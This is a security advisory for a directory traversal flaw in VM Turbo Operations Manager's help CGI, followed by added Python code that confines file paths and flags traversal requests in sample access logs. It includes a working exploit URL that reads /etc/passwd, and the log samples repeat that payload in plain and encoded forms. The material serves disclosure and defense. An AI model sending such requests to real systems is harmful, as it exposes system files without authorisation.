VM Turbo Operations Manager 4.5x – Directory Traversal

  • Author: Jamal Pecou
    Date: 2014-05-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33334/
  • Product: VM Turbo Operations Manager
    Vendor: VM Turbo
    Vulnerable Version(s): 4.5.x and earlier
    Tested Version: 4.0
    Advisory Publication: April 11, 2014 
    Vendor Notification: April 11, 2014 
    Public Disclosure: May 8, 2014 
    Vulnerability Type: Directory Traversal
    
    Discovered and Provided by: Jamal Pecou, Security Focus (https://www.securityfocus.com/)
    
    -----------------------------------------------------------------------------------------------
    
    Advisory Details:
    
    A directory traversal vulnerability affects "/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager. When the URL-encoded POST input "xml_path" is set to "../../../../../../../../../../etc/passwd", the contents of that file are returned in the response.
    
    
    The following exploitation example displays the contents of /etc/passwd
    
    http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd
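    The root cause is a file path taken from the "xml_path" parameter and opened without confining it to the directory the help CGI is meant to serve from. The following is an added example, not code from the advisory or from VM Turbo: it shows the confinement check a hardened handler would apply to that parameter (percent-decoding repeatedly so that double-encoded "../" is caught, then requiring the normalized path to stay under an assumed help root), plus a small detector that flags the advisory's request pattern in constructed web-server access-log lines. The help root "/opt/vmturbo/help" and the log lines are assumptions made up for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Assumed directory that doIt.cgi is meant to load XML help files from (not from the advisory).
HELP_ROOT = "/opt/vmturbo/help"


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded sequences such as %252e%252e%252f are unmasked before any check."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_resolve(xml_path: str, root: str = HELP_ROOT) -> Optional[str]:
    """Return the absolute path under `root` that `xml_path` names,
    or None if the request would escape `root` (the traversal the advisory describes)."""
    candidate = decode_fully(xml_path)
    # Reject NUL bytes (path truncation) and absolute paths outright.
    if "\x00" in candidate or candidate.startswith(("/", "\\")):
        return None
    root_abs = os.path.abspath(root)
    # normpath collapses "../" components; no filesystem access is needed for the check.
    resolved = os.path.normpath(os.path.join(root_abs, candidate))
    # The resolved path must be strictly inside the root directory.
    if not resolved.startswith(root_abs + os.sep):
        return None
    return resolved


# Constructed access-log lines (Combined Log Format) for the detection example.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/May/2014:10:01:12 +0000] "GET /cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=topics/intro.xml HTTP/1.1" 200 4120',
    '10.0.0.9 - - [08/May/2014:10:02:40 +0000] "GET /cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1873',
    '10.0.0.9 - - [08/May/2014:10:03:02 +0000] "GET /cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1873',
    '10.0.0.7 - - [08/May/2014:10:04:15 +0000] "GET /index.html HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def find_traversal_requests(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_uri) for lines whose request URI, after
    percent-decoding, still carries a parent-directory reference."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        uri = decode_fully(m.group(1))
        if "../" in uri or "..\\" in uri:
            hits.append((n, uri))
    return hits


if __name__ == "__main__":
    for p in ("topics/intro.xml", "../../../../../../../../../../etc/passwd", "%2e%2e%2fetc%2fpasswd"):
        print(f"{p!r:55} -> {safe_resolve(p)}")
    for n, uri in find_traversal_requests(SAMPLE_LOG):
        print(f"log line {n}: traversal in {uri}")
```

    A check based on the normalized absolute path, rather than on stripping "../" substrings, is what matters here: substring filters are bypassed by encoding variants, while the path comparison rejects any input whose final location lies outside the root. Note that the advisory's own example uses a GET query string even though it describes a POST input; the check is the same whichever way the parameter arrives.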
    
    -----------------------------------------------------------------------------------------------
    
    Solution:
    
    The vendor has released a fix for this vulnerability in version 4.6.
    
    References:
    
    [1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement